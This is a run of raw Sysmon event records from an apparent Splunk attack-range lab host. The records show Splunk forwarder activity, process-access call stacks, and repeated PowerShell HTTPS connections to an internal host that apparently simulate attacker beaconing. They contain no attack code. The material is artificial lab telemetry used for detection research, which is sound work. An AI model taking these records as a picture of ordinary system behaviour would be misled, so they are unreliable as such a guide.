21:54:22.061{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62032-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127482Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:59.978{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127481Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:59.095{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AF602E581BFC42AA60AC1ADEB8E0808,SHA256=04653DE5A835A22827FEFAE25211D0549EC7833181ED5E30A52BBD1395551077,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127483Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:00.109{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E7E7B01F2A8A02F23A0A2D776C52AA6,SHA256=C601541795A2C63F9A8FCE9DBEC5B85D51C318625E127BD0704804F84D881184,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127485Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:26.141{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62034-false10.0.1.12-8089- 23542300x800000000000000035127484Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:01.139{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E480EB91B7CA0282D73EC341060FEE91,SHA256=494225B862BDD33567C8B0EA5AF1B7DCBCEAD794B057F77E84B206CE7E62A12F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127487Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:02.957{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6B47682D501DF61EF576082C8DD9A935,SHA256=7B99152A43ABAD93B7BDC05DB47FD3E912F42C5107BC308F2476DBA803638ED7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127486Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:02.157{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80639C3A32CCF077AF15E61F22248746,SHA256=0D4C1C8ACBD0E3FD6B819D3DBAE2303EC5B0D71231ECC5395272C488F4E22388,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127488Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:03.176{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6C295075DF44239E404D0884111F19A,SHA256=87675B2408A50298A84E251786E870624F11385001336D8E4B0447FF8C0CAAE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127491Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:04.195{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=189EA0EB9B48B219747BA6009927A30F,SHA256=E7AD2821DB9FA052AF14A50EEE047ED66511D2CDCC59F1D0C814A1E43CF85A71,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127490Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:28.354{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62036-false10.0.1.12-8000- 354300x800000000000000035127489Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:28.071{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62035-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127492Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:05.195{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6D3C8832179B048D9D78509158043A2,SHA256=F474BF1F861F63162501B7AE53323FC94EDABCB355B5AEB790C312E170948BB5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127493Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:06.196{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B01ABB8825A90873F2CE86CAB5C4AFA3,SHA256=4BD8D26BF0BBB1D4D1E05181C45A76B31EFB67D9AC6A236868D4796832C54187,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127495Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:07.913{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BCDEE98809360A6B3520292776FE7759,SHA256=B3128EE0409514FB31EFAD2D794E537672C3A870AEAC505743D6AAC874828DAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127494Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:07.227{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE0069C9E82A73D8BF0D7255ECD67C3D,SHA256=CAFC5E9D5D50608660015D7CD834A5F3A7A80EBCAC9095E405CA3D78A9C19B96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127497Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:08.462{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D51060AC37E0A3823BF8DCCB0067A09,SHA256=2BF30F96EC5DC808A17B64066AD50EABF7B2EBFEC9A8721BACD6B2D87B8DE643,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127496Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:33.075{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62037-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127499Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:09.480{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5D92985090BD541E8D8F192DA2D3994,SHA256=BAFA73DF45C230DAD55B82AB094333B91B0175A7AA11C92EC5BF3FC8D3716F50,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127498Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:33.359{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62038-false10.0.1.12-8000- 10341000x800000000000000035127509Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:10.610{B81B27B7-8282-613A-AF96-03000000C801}50285912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035127508Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:10.510{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D0406CB72825FEDF20B2FB3C93FDEF5,SHA256=594B8C6FDC26BC7F36BB79BB07D424AEE765A95F67E5840C1F7A94E5C6E9E82A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127507Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:10.410{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8282-613A-AF96-03000000C801}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127506Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:10.410{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127505Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:10.410{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127504Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:10.410{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127503Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:10.410{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127502Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:10.410{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-8282-613A-AF96-03000000C801}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127501Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:10.410{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8282-613A-AF96-03000000C801}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127500Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:10.395{B81B27B7-8282-613A-AF96-03000000C801}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127520Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:11.525{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACE23B872D1B0D235A06DAAB01FB78E0,SHA256=40F39C5DFF769C75BD6A1C68932FD707111E9406ACA4D773E19E7178122F8FA2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127519Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:11.410{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA7CFD29983ECB950709471358CAD4F2,SHA256=A9592EDA787EB32393391D2BCE36C7CC72B3F507CC42D547D74E9E0C981D64DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127518Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:11.410{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F20CA6E9DE4252C3EE744401A0B198B9,SHA256=63D711AF46328CCA08217B8D32CC04E3290509F697EC8B55D3F658ABE40DBE7D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127517Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:11.094{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8283-613A-B096-03000000C801}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127516Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:11.094{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127515Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:11.094{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127514Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:11.094{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127513Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:11.094{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127512Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:11.094{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8283-613A-B096-03000000C801}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127511Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:11.094{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8283-613A-B096-03000000C801}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 